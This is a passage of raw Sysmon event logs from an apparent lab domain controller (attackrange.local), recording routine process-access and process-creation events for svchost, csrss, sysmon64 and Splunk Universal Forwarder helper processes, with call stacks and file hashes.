ntdll.dll+51791 10341000x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.626{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.627{59A5CD1D-8EEC-6005-E100-00000000A301}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.970{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.971{59A5CD1D-8EED-6005-E300-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.439{59A5CD1D-8EED-6005-E200-00000000A301}41084048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EED-6005-E200-00000000A301}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:45.298{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
